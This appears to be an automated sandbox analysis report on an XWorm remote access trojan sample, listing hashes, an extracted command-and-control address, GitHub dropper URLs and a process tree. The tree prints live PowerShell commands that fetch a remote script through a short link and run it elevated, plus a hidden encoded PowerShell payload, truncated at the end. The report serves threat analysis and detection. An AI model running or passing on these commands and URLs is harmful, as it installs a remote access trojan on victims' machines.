xworm | 7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576

Analysis

max time kernel
0s
max time network
48s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-01-2025 07:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.txt
Size

261B
MD5

b7d1dea96fc88cf58391d928a3558e32
SHA1

c4a5be1b46c579c8405006c7da0b672181e90403
SHA256

7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576
SHA512

08b08f2bf4f735c673f550c432badcf42e625e240971b78b8dc5d5c43f48076196aac44926882e4e0483f122a32c6633b6d57467e05ffe30fd5ee4190c351572

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe

Extracted

Family

xworm

147.185.221.24:35724

Attributes

Install_directory
%ProgramData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00280000000462b5-277.dat	family_xworm
behavioral1/memory/6108-287-0x0000000000B40000-0x0000000000B56000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
3872	PowerShell.exe
4332	powershell.exe
2492	powershell.exe
4900	powershell.exe
5776	powershell.exe
5952	powershell.exe
6092	powershell.exe
5220	powershell.exe
4004	powershell.exe
4480	powershell.exe
5952	powershell.exe
5220	powershell.exe
5444	powershell.exe
4900	powershell.exe
5776	powershell.exe
6092	powershell.exe
4764	powershell.exe
3740	powershell.exe
5376	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
41	raw.githubusercontent.com
61	raw.githubusercontent.com
39	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
67	ip-api.com

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4808	schtasks.exe

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
1⤵
PID:4248

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg
    3⤵
    PID:3696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ff87f0b46f8,0x7ff87f0b4708,0x7ff87f0b4718
      4⤵
      PID:2672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
      4⤵
      PID:2968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
      4⤵
      PID:4872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
      4⤵
      PID:4620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
      4⤵
      PID:4120
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
      4⤵
      PID:3020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
      4⤵
      PID:5480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      PID:5544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff77a2a5460,0x7ff77a2a5470,0x7ff77a2a5480
        5⤵
        
        PID:5400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
      4⤵
      PID:5948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
      4⤵
      PID:5808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
      4⤵
      PID:5784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
      4⤵
      PID:5220
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,5674684382114288140,1303943752737324548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
      4⤵
      PID:5484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBUAGcAQgB2AEEARgBBAEEAYwBnAEIAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAYgB3AEIAcwBBAEcAawBBAFkAdwBCADUAQQBDAEEAQQBRAGcAQgA1AEEASABBAEEAWQBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBGAGMAQQBhAFEAQgB1AEEARwBRAEEAYgB3AEIAMwBBAEYATQBBAGQAQQBCADUAQQBHAHcAQQBaAFEAQQBnAEEARQBnAEEAYQBRAEIAawBBAEcAUQBBAFoAUQBCAHUAQQBDAEEAQQBMAFEAQgBGAEEARwA0AEEAWQB3AEIAdgBBAEcAUQBBAFoAUQBCAGsAQQBFAE0AQQBiAHcAQgB0AEEARwAwAEEAWQBRAEIAdQBBAEcAUQBBAEkAQQBBAGkAQQBHAE0AQQBRAFEAQgBDAEEASABZAEEAUQBRAEIASQBBAEcATQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA1AEEARQBFAEEAUwBBAEIATgBBAEUARQBBAFkAUQBCAEIAQQBFAEkAQQBiAEEAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcASQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEgAYwBBAFEAZwBCAHcAQQBFAEUAQQBSAHcAQQAwAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGQAZwBCAEIAQQBFAGcAQQBZAHcAQgBCAEEARgBVAEEAZAB3AEIAQwBBAEQAQQBBAFEAUQBCAEkAQQBHAHMAQQBRAFEAQgBpAEEARQBFAEEAUQBnAEIAcwBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBVAHcAQgBCAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBGAG8AQQBRAFEAQgBDAEEARwB3AEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIATgBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBkAEEAQgBCAEEARQBjAEEATQBBAEIAQgBBAEYAawBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARgBFAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCAHAAQQBFAEUAQQBSAFEAQgBGAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGEAdwBCAEIAQQBFAE0AQQBNAEEAQgBCAEEARgBRAEEAVQBRAEIAQwBBAEgAYwBBAFEAUQBCAEcAQQBFAEUAQQBRAFEAQgBqAEEARwBjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAFoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAZQBRAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBHAEkAQQBaAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIAVgBBAEUARQBBAFoAUQBCAEIAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcAUQBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBIAEEARwBzAEEAUQBRAEIAaQBBAEgAYwBBAFEAZwBCADEAQQBFAEUAQQBSAGcAQgBCAEEARQBFAEEAVwBRAEIAUgBBAEUASQBBAE0AQQBCAEIAQQBFAGMAQQBaAHcAQgBCAEEARQBrAEEAUQBRAEIAQgBBAEcANABBAFEAUQBCAEYAQQBFADAAQQBRAFEAQgBQAEEARwBjAEEAUQBnAEIAagBBAEUARQBBAFIAZwBCAEIAQQBFAEUAQQBZAHcAQgBuAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFkAdwBCAEIAQQBHAE0AQQBaAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEQAQQBBAFEAUQBCAFMAQQBFAEUAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFcAUQBCAFIAQQBFAEUAQQBiAGcAQgBCAEEARQBNAEEAUwBRAEIAQgBBAEUATQBBAFoAdwBCAEMAQQBIAGMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAHMAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQB3AEIAMwBBAEUASQBBAGIAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAEgATQBBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBNAEEARgBFAEEAUQBnAEIAWQBBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBuAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAE8AQQBCAEIAQQBHAFEAQQBkAHcAQgBDAEEARgBRAEEAUQBRAEIASQBBAEYARQBBAFEAUQBCAGwAQQBGAEUAQQBRAGcAQgB6AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFMAUQBCAEIAQQBFAEkAQQBTAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEYAbwBBAFEAUQBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARgBVAEEAUQBRAEIAaQBBAEcAYwBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBRAEIAMwBBAEUASQBBAGQAZwBCAEIAQQBFAGMAQQBNAEEAQgBCAEEARwBJAEEAVQBRAEIAQwBBAEcAZwBBAFEAUQBCAEgAQQBEAFEAQQBRAFEAQgBhAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEoAQQBFAEUAQQBVAFEAQgBSAEEARQBJAEEAYQB3AEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBFAHcAQQBVAFEAQgBDAEEARQA0AEEAUQBRAEIASQBBAEUARQBBAFEAUQBCAFYAQQBFAEUAQQBRAGcAQgA1AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFcAZwBCAG4AQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAUwBRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAYQBBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQQB3AEEARQBFAEEAVQBnAEIAUgBBAEUASQBBAE4AQQBCAEIAQQBFAGMAQQBUAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAEQARQBBAFEAUQBCAEkAQQBFADAAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAMgBBAEUARQBBAFIAdwBBADAAQQBFAEUAQQBWAFEAQgBCAEEARQBJAEEAYQBBAEIAQgBBAEUAZwBBAFUAUQBCAEIAQQBHAEUAQQBRAFEAQgBCAEEARwBjAEEAUQBRAEIARABBAEcATQBBAFEAUQBCAFIAQQBIAGMAQQBRAFEAQQAyAEEARQBFAEEAUgBnAEIAMwBBAEUARQBBAFYAZwBCAFIAQQBFAEkAQQBlAGcAQgBCAEEARQBjAEEAVgBRAEIAQgBBAEcATQBBAFoAdwBCAEMAQQBIAG8AQQBRAFEAQgBHAEEASABjAEEAUQBRAEIAVgBBAEUARQBBAFEAZwBBAHgAQQBFAEUAQQBSAHcAQgBKAEEARQBFAEEAWQBnAEIAQgBBAEUASQBBAGMAQQBCAEIAQQBFAGMAQQBUAFEAQgBCAEEARgBnAEEAUQBRAEIAQwBBAEUAVQBBAFEAUQBCAEgAQQBEAGcAQQBRAFEAQgBrAEEASABjAEEAUQBnAEIAMQBBAEUARQBBAFIAdwBCADMAQQBFAEUAQQBZAGcAQgAzAEEARQBJAEEAYQBBAEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBHAE0AQQBkAHcAQgBCAEEARwA0AEEAUQBRAEIARABBAEUAawBBAFEAUQBCAEQAQQBHAGMAQQBRAGcAQgAzAEEARQBFAEEAUgB3AEEANABBAEUARQBBAFoAQQBCADMAQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAUwBRAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBHADgAQQBRAFEAQgBIAEEARgBVAEEAUQBRAEIAaQBBAEUARQBBAFEAZwBCAHoAQQBFAEUAQQBRAHcAQgBCAEEARQBFAEEAVABBAEIAUgBBAEUASQBBAFcAQQBCAEIAQQBFAGMAQQBhAHcAQgBCAEEARwBJAEEAWgB3AEIAQwBBAEcAcwBBAFEAUQBCAEgAQQBEAGcAQQBRAFEAQgBrAEEASABjAEEAUQBnAEIAVQBBAEUARQBBAFMAQQBCAFIAQQBFAEUAQQBaAFEAQgBSAEEARQBJAEEAYwB3AEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBFAGsAQQBRAFEAQgBDAEEARQBrAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGEAQQBFAEUAQQBRAGcAQgByAEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFkAZwBCAG4AQQBFAEUAQQBaAHcAQgBCAEEARQBNAEEATQBBAEIAQgBBAEYARQBBAGQAdwBCAEMAQQBIAFkAQQBRAFEAQgBIAEEARABBAEEAUQBRAEIAaQBBAEYARQBBAFEAZwBCAG8AQQBFAEUAQQBSAHcAQQAwAEEARQBFAEEAVwBnAEIAQgBBAEUARQBBAFoAdwBCAEIAQQBFAE0AQQBTAFEAQgBCAEEARgBFAEEAVQBRAEIAQwBBAEcAcwBBAFEAUQBCAEgAQQBGAEUAQQBRAFEAQgBNAEEARgBFAEEAUQBnAEIATwBBAEUARQBBAFMAQQBCAEIAQQBFAEUAQQBWAFEAQgBCAEEARQBJAEEAZQBRAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBGAG8AQQBaAHcAQgBDAEEARwB3AEEAUQBRAEIASQBBAEUAawBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgAxAEEARQBFAEEAUgB3AEIATgBBAEUARQBBAFcAZwBCAFIAQQBFAEUAQQBaAHcAQgBCAEEARQBNAEEATQBBAEIAQgBBAEYASQBBAFUAUQBCAEMAQQBEAFEAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAaQBBAEUARQBBAFEAZwBBAHgAQQBFAEUAQQBTAEEAQgBOAEEARQBFAEEAWQBRAEIAUgBBAEUASQBBAGQAZwBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARgBVAEEAUQBRAEIAQwBBAEcAZwBBAFEAUQBCAEkAQQBGAEUAQQBRAFEAQgBoAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAGoAQQBFAEUAQQBVAFEAQgAzAEEARQBFAEEATgBnAEIAQgBBAEUAWQBBAGQAdwBCAEIAQQBGAFkAQQBkAHcAQgBDAEEASABBAEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAGEAQQBFAEUAQQBRAGcAQgAyAEEARQBFAEEAUwBBAEIAagBBAEUARQBBAFkAdwBCADMAQQBFAEkAQQBZAHcAQgBCAEEARQBZAEEAVABRAEIAQgBBAEcAVQBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBJAEEARgBFAEEAUQBRAEIAYQBBAEYARQBBAFEAZwBCADAAQQBFAEUAQQBSAEEAQgBOAEEARQBFAEEAVABRAEIAbgBBAEUARQBBAGIAZwBCAEIAQQBFAE0AQQBTAFEAQgBCAEEARQBNAEEAWgB3AEIAQwBBAEgAYwBBAFEAUQBCAEgAQQBEAGcAQQBRAFEAQgBrAEEASABjAEEAUQBnAEIAcwBBAEUARQBBAFMAQQBCAEoAQQBFAEUAQQBZAHcAQgAzAEEARQBJAEEAYgB3AEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBHAEkAQQBRAFEAQgBDAEEASABNAEEAUQBRAEIARABBAEUARQBBAFEAUQBCAE0AQQBGAEUAQQBRAGcAQgBZAEEARQBFAEEAUgB3AEIAcgBBAEUARQBBAFkAZwBCAG4AQQBFAEkAQQBhAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcAUQBBAGQAdwBCAEMAQQBGAFEAQQBRAFEAQgBJAEEARgBFAEEAUQBRAEIAbABBAEYARQBBAFEAZwBCAHoAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAUwBRAEIAQgBBAEUASQBBAFMAUQBCAEIAQQBFAGMAQQBhAHcAQgBCAEEARgBvAEEAUQBRAEIAQwBBAEcAcwBBAFEAUQBCAEgAQQBGAFUAQQBRAFEAQgBpAEEARwBjAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBBAHcAQQBFAEUAQQBVAFEAQgAzAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAE0AQQBCAEIAQQBHAEkAQQBVAFEAQgBDAEEARwBnAEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAGEAQQBFAEUAQQBRAFEAQgBuAEEARQBFAEEAUQB3AEIASgBBAEUARQBBAFUAUQBCAFIAQQBFAEkAQQBhAHcAQgBCAEEARQBjAEEAVQBRAEIAQgBBAEUAdwBBAFUAUQBCAEMAQQBFADQAQQBRAFEAQgBJAEEARQBFAEEAUQBRAEIAVgBBAEUARQBBAFEAZwBCADUAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAVwBnAEIAbgBBAEUASQBBAGIAQQBCAEIAQQBFAGcAQQBTAFEAQgBCAEEARgBvAEEAVQBRAEIAQwBBAEgAVQBBAFEAUQBCAEgAQQBFADAAQQBRAFEAQgBhAEEARgBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBBAHcAQQBFAEUAQQBVAGcAQgBSAEEARQBJAEEATgBBAEIAQgBBAEUAYwBBAFQAUQBCAEIAQQBHAEkAQQBRAFEAQgBDAEEARABFAEEAUQBRAEIASQBBAEUAMABBAFEAUQBCAGgAQQBGAEUAQQBRAGcAQgAyAEEARQBFAEEAUgB3AEEAMABBAEUARQBBAFYAUQBCAEIAQQBFAEkAQQBhAEEAQgBCAEEARQBnAEEAVQBRAEIAQgBBAEcARQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARwBNAEEAUQBRAEIAUgBBAEgAYwBBAFEAUQBBADIAQQBFAEUAQQBSAGcAQgAzAEEARQBFAEEAVgBnAEIAMwBBAEUASQBBAGMAQQBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARgBvAEEAUQBRAEIAQwBBAEgAWQBBAFEAUQBCAEkAQQBHAE0AQQBRAFEAQgBqAEEASABjAEEAUQBnAEIAagBBAEUARQBBAFIAZwBCAE4AQQBFAEUAQQBaAFEAQgBSAEEARQBJAEEAZQBnAEIAQgBBAEUAWQBBAFkAdwBCAEIAQQBGAFEAQQBkAHcAQgBDAEEARgBnAEEAUQBRAEIARQBBAEYAawBBAFEAUQBCAE8AQQBFAEUAQQBRAFEAQgB1AEEARQBFAEEAUQB3AEIASgBBAEUARQBBAFEAdwBCAG4AQQBFAEkAQQBkAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcAUQBBAGQAdwBCAEMAQQBHAHcAQQBRAFEAQgBJAEEARQBrAEEAUQBRAEIAagBBAEgAYwBBAFEAZwBCAHYAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAWQBnAEIAQgBBAEUASQBBAGMAdwBCAEIAQQBFAE0AQQBRAFEAQgBCAEEARQB3AEEAVQBRAEIAQwBBAEYAZwBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBpAEEARwBjAEEAUQBnAEIAcgBBAEUARQBBAFIAdwBBADQAQQBFAEUAQQBaAEEAQgAzAEEARQBJAEEAVgBBAEIAQgBBAEUAZwBBAFUAUQBCAEIAQQBHAFUAQQBVAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAGcAQgBKAEEARQBFAEEAUgB3AEIAcgBBAEUARQBBAFcAZwBCAEIAQQBFAEkAQQBhAHcAQgBCAEEARQBjAEEAVgBRAEIAQgBBAEcASQBBAFoAdwBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAUgBBAEgAYwBBAFEAZwBCADIAQQBFAEUAQQBSAHcAQQB3AEEARQBFAEEAWQBnAEIAUgBBAEUASQBBAGEAQQBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARgBvAEEAUQBRAEIAQgBBAEcAYwBBAFEAUQBCAEQAQQBFAGsAQQBRAFEAQgBSAEEARgBFAEEAUQBnAEIAcgBBAEUARQBBAFIAdwBCAFIAQQBFAEUAQQBUAEEAQgBSAEEARQBJAEEAVABnAEIAQgBBAEUAZwBBAFEAUQBCAEIAQQBGAFUAQQBRAFEAQgBDAEEASABrAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAGEAQQBHAGMAQQBRAGcAQgBzAEEARQBFAEEAUwBBAEIASgBBAEUARQBBAFcAZwBCAFIAQQBFAEkAQQBkAFEAQgBCAEEARQBjAEEAVABRAEIAQgBBAEYAbwBBAFUAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAUwBBAEYARQBBAFEAZwBBADAAQQBFAEUAQQBSAHcAQgBOAEEARQBFAEEAWQBnAEIAQgBBAEUASQBBAE0AUQBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARwBFAEEAVQBRAEIAQwBBAEgAWQBBAFEAUQBCAEgAQQBEAFEAQQBRAFEAQgBWAEEARQBFAEEAUQBnAEIAbwBBAEUARQBBAFMAQQBCAFIAQQBFAEUAQQBZAFEAQgBCAEEARQBFAEEAWgB3AEIAQgBBAEUATQBBAFkAdwBCAEIAQQBGAEUAQQBkAHcAQgBCAEEARABZAEEAUQBRAEIARwBBAEgAYwBBAFEAUQBCAFcAQQBIAGMAQQBRAGcAQgB3AEEARQBFAEEAUgB3AEEAMABBAEUARQBBAFcAZwBCAEIAQQBFAEkAQQBkAGcAQgBCAEEARQBnAEEAWQB3AEIAQgBBAEcATQBBAGQAdwBCAEIAQQBHADQAQQBRAFEAQgBEAEEARQBrAEEAUQBRAEIARABBAEcAYwBBAFEAUQBCAEwAQQBFAEUAQQBRAHcAQgBSAEEARQBFAEEAWgBBAEIAUgBBAEUASQBBAGUAUQBCAEIAQQBFAGMA